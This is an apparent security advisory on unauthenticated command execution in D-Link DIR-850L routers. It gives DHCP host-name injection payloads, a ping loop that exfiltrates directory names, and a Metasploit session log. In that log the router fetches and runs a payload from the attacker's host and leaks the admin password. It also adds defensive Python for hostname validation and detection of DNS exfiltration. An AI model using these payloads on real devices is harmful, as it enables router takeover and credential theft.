Dlink DIR-850L UnAuthenticated OS Command Execution

The vulnerabilities were reported as part of the Hack2Win competition; for more information about Hack2Win see https://blogs.securiteam.com/index.php/archives/3310.

The vulnerabilities found in D-Link 850L are:

  • Remote Command Execution via WAN and LAN
  • Remote Unauthenticated Information Disclosure via WAN and LAN
  • Unauthorized Remote Code Execution as root via LAN

Dlink DIR-850L UnAuthenticated OS Command Execution as root via LAN

The D-Link 850L runs the dnsmasq daemon as root. The daemon executes the “host-name” parameter it receives from the DHCP server.
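
The root cause described above is that an attacker-controlled DHCP option value reaches a command line as text. The following Python is an added example written for this page, not D-Link or dnsmasq code: it shows the vulnerable interpolation pattern next to a hardened lease handler that validates the host-name option as an RFC 1123 hostname and passes it as a single argv element, so that a value such as `;ping 192.168.0.100` is rejected and could not be re-parsed as shell syntax even if it were accepted. The hook path and all function names are assumptions made for the illustration.

```python
"""Treating the DHCP host-name option as data rather than as a command.

Added example (not D-Link or dnsmasq code). The hook path and the function
names are assumptions made for this illustration.
"""
import re
import shlex
from typing import List, Optional

# Hypothetical lease hook that a DHCP daemon would run as root on a lease event.
HOOK_PATH = "/etc/dhcp/lease-hook.sh"

# RFC 1123 label: 1-63 letters, digits or hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(name: str) -> bool:
    """Syntactic check for a DHCP host-name option value.

    A name that passes cannot contain ';', '`', '$', '|', quotes or spaces,
    so the injection shown on this page is rejected before any command runs.
    """
    if not name:
        return False
    if name.endswith("."):          # allow one trailing dot (FQDN form)
        name = name[:-1]
    if len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def unsafe_command_line(action: str, mac: str, ip: str, hostname: str) -> str:
    """The vulnerable pattern: untrusted option text interpolated into a shell line.

    Returned as a string and never executed, so the effect of an injected ';'
    stays visible: a shell would parse everything after it as a second command.
    """
    return f"{HOOK_PATH} {action} {mac} {ip} {hostname}"


def build_hook_argv(action: str, mac: str, ip: str,
                    hostname: Optional[str]) -> List[str]:
    """Hardened form: validate the option, then pass it as one argv element.

    The returned list is meant for subprocess.run(argv) without shell=True, so
    the hostname is never re-parsed as shell syntax whatever it contains.
    """
    if action not in ("add", "old", "del"):
        raise ValueError(f"unexpected lease action: {action!r}")
    argv = [HOOK_PATH, action, mac, ip]
    if hostname is not None:
        if not is_valid_hostname(hostname):
            raise ValueError(f"rejected DHCP host-name option: {hostname!r}")
        argv.append(hostname)
    return argv


def safe_command_line(argv: List[str]) -> str:
    """If a shell string is unavoidable (e.g. for logging), quote every element."""
    return " ".join(shlex.quote(arg) for arg in argv)


if __name__ == "__main__":
    mac, ip = "00:11:22:33:44:55", "192.168.0.100"   # constructed sample lease
    for candidate in ("kali", ";ping 192.168.0.100"):
        print("unsafe :", unsafe_command_line("add", mac, ip, candidate))
        try:
            print("argv   :", build_hook_argv("add", mac, ip, candidate))
        except ValueError as exc:
            print("reject :", exc)
        print("quoted :", safe_command_line([HOOK_PATH, "add", mac, ip, candidate]))
```

The validation step is the real fix; the argv and quoting helpers are defence in depth for the case where a daemon must still hand the value to an external script.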

Affected version

DIR-850L routers with firmware up to 1.14B07

Proof of Concept

In order to exploit this vulnerability, we need to be on the same LAN as the victim and to control a DHCP server on it.

In this Proof of Concept we will use a Kali machine.

The attacker needs to edit the /etc/dhcp/dhclient.conf file and change the host-name field to the command we want to execute.

The following DHCP request will execute the ping command on the router:

send host-name = ";ping 192.168.0.100";

In order to see the results you need to sniff the network and inspect the packets.

Using DNS to exfiltrate information:

send host-name = ";for i in `ls /`; do ping $i;done";

If we sniff the network, we see the following:

17:41:42.963917 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36

17:41:44.955685 IP 192.168.1.100.37895 > 192.168.1.1.53: 2+ AAAA? www. (21)
17:41:44.955754 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.956251 IP 192.168.1.100.51733 > 192.168.1.1.53: 3+ AAAA? www. (21)
17:41:44.956282 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.956797 IP 192.168.1.100.52958 > 192.168.1.1.53: 4+ AAAA? www. (21)
17:41:44.956821 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.957639 IP 192.168.1.100.49007 > 192.168.1.1.53: 5+ A? www. (21)
17:41:44.957660 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.958327 IP 192.168.1.100.42641 > 192.168.1.1.53: 6+ A? www. (21)
17:41:44.958351 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.958837 IP 192.168.1.100.36077 > 192.168.1.1.53: 7+ A? www. (21)
17:41:44.958857 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.965678 IP 192.168.1.100.49884 > 192.168.1.1.53: 2+ AAAA? var. (21)
17:41:44.965704 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.969792 IP 192.168.1.100.53144 > 192.168.1.1.53: 3+ AAAA? var. (21)
17:41:44.969820 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.970305 IP 192.168.1.100.32949 > 192.168.1.1.53: 4+ AAAA? var. (21)
17:41:44.970326 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.970971 IP 192.168.1.100.48094 > 192.168.1.1.53: 5+ A? var. (21)
17:41:44.970993 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.971505 IP 192.168.1.100.52246 > 192.168.1.1.53: 6+ A? var. (21)
17:41:44.971516 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.972015 IP 192.168.1.100.41323 > 192.168.1.1.53: 7+ A? var. (21)
17:41:44.972036 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.974624 IP 192.168.1.100.50795 > 192.168.1.1.53: 2+ AAAA? usr. (21)
17:41:44.974653 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.975316 IP 192.168.1.100.38359 > 192.168.1.1.53: 3+ AAAA? usr. (21)
17:41:44.975337 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.975827 IP 192.168.1.100.55240 > 192.168.1.1.53: 4+ AAAA? usr. (21)
17:41:44.975848 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.976660 IP 192.168.1.100.44499 > 192.168.1.1.53: 5+ A? usr. (21)
17:41:44.976668 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.979721 IP 192.168.1.100.57446 > 192.168.1.1.53: 6+ A? usr. (21)
17:41:44.979748 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.980401 IP 192.168.1.100.35172 > 192.168.1.1.53: 7+ A? usr. (21)
17:41:44.980422 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.983041 IP 192.168.1.100.60090 > 192.168.1.1.53: 2+ AAAA? tmp. (21)
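
The capture above shows what this exfiltration looks like on the wire: the queried names (www, var, usr, tmp) are the entries of the listed directory, each looked up as a bare single-label name. As an added example, not part of the advisory, the following Python turns that observation into detection logic over tcpdump-style lines. The sample lines are constructed to mimic the capture above (with one ordinary FQDN lookup and one stray single-label lookup from another host added as controls), and the alert threshold of three distinct bare labels per source is an assumption to be tuned per network.

```python
"""Spotting command output exfiltrated as DNS lookups in tcpdump output.

Added example for this advisory, not part of it. The sample lines are
constructed to mimic the capture on this page; the threshold is an assumption.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set

# tcpdump's one-line form for a DNS query:
#   "<ts> IP <src>.<sport> > <dst>.53: <id>+ <type>? <name> (<len>)"
DNS_QUERY = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\.53: \d+\+ "
    r"(?P<qtype>A|AAAA)\? (?P<qname>\S+) \(\d+\)$"
)

# Constructed sample: four bare names from one host (the pattern the
# directory-listing loop on this page produces), one ordinary FQDN lookup and
# one lone bare-name lookup from another host, plus ICMP noise to be ignored.
SAMPLE_CAPTURE = """\
17:41:44.955685 IP 192.168.1.100.37895 > 192.168.1.1.53: 2+ AAAA? www. (21)
17:41:44.955754 IP 192.168.1.1 > 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36
17:41:44.957639 IP 192.168.1.100.49007 > 192.168.1.1.53: 5+ A? www. (21)
17:41:44.965678 IP 192.168.1.100.49884 > 192.168.1.1.53: 2+ AAAA? var. (21)
17:41:44.974624 IP 192.168.1.100.50795 > 192.168.1.1.53: 2+ AAAA? usr. (21)
17:41:44.983041 IP 192.168.1.100.60090 > 192.168.1.1.53: 2+ AAAA? tmp. (21)
17:41:45.101010 IP 192.168.1.50.41000 > 192.168.1.1.53: 9+ A? www.example.com. (33)
17:41:45.202020 IP 192.168.1.50.41001 > 192.168.1.1.53: 10+ A? printer. (25)
"""


def parse_dns_queries(lines: Iterable[str]) -> List[dict]:
    """Return one dict per DNS query line; ICMP and other lines are skipped."""
    queries = []
    for line in lines:
        m = DNS_QUERY.match(line.strip())
        if m:
            queries.append(m.groupdict())
    return queries


def bare_label(qname: str) -> Optional[str]:
    """Return the name without its trailing dot if it is a single label, else None."""
    name = qname[:-1] if qname.endswith(".") else qname
    return name if name and "." not in name else None


def find_exfil_sources(lines: Iterable[str], threshold: int = 3) -> Dict[str, List[str]]:
    """Map source IP -> sorted distinct bare labels, for sources at or above threshold.

    Ordinary clients resolve FQDNs; a burst of distinct single-label lookups
    from one host is the signature of a loop feeding filenames or command
    output to the resolver, as in the capture on this page.
    """
    seen: Dict[str, Set[str]] = defaultdict(set)
    for q in parse_dns_queries(lines):
        label = bare_label(q["qname"])
        if label is not None:
            seen[q["src"]].add(label)
    return {src: sorted(labels) for src, labels in seen.items() if len(labels) >= threshold}


if __name__ == "__main__":
    for src, labels in find_exfil_sources(SAMPLE_CAPTURE.splitlines()).items():
        print(f"{src}: {len(labels)} distinct bare-name lookups: {', '.join(labels)}")
```

Run against `tcpdump -n -l port 53` output piped through stdin, the same function works unchanged; lowering the threshold trades false positives from hosts with search-domain suffix lookups against sensitivity to short listings.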

You can exploit the Dlink DIR-850L UnAuthenticated OS Command Execution vulnerability using Metasploit.

  1. Download the dlink_850l_unauth_exec module and move it to the /usr/share/metasploit-framework/modules/exploits/linux/http/ directory
  2. Start msfconsole
    use exploit/linux/http/dlink_dir850l_unauth_exec.rb
    set RHOST [RouterIP]
    set PAYLOAD linux/mipsbe/shell/reverse_tcp
    run
  3. If the router is vulnerable, the payload is dropped via wget and executed, and a session should be obtained
    msf > use exploit/linux/http/dlink_dir850l_unauth_exec
    
    msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
    RHOST => 192.168.0.14
    msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
    RPORT => 80
    msf exploit(dlink_dir850l_unauth_exec) > check
    [*] 192.168.0.14:80 The target service is running, but could not be validated.
    msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
    VERBOSE => true
    msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
    LHOST => ens3
    msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
    LPORT => 3131
    msf exploit(dlink_dir850l_unauth_exec) > run

    [*] Started reverse TCP handler on 192.168.0.11:3131
    [*] 192.168.0.14:80 - Connecting to target...
    [+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
    [+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
    [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
    [*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
    [*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
    [*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
    [*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
    [*] 192.168.0.14:80 - Sending payload to the server...
    [*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
    [*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
    [*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
    [*] Sending stage (84 bytes) to 192.168.0.14
    [*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
    [+] Deleted /tmp/uoskutcy
    [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
    [*] Server stopped.
    [*] Exploit completed, but no session was created.
    msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
    [*] Starting interaction with 1...

    190745749
    wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
    true
    pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
    OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
    iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
    pwd
    /

Reference: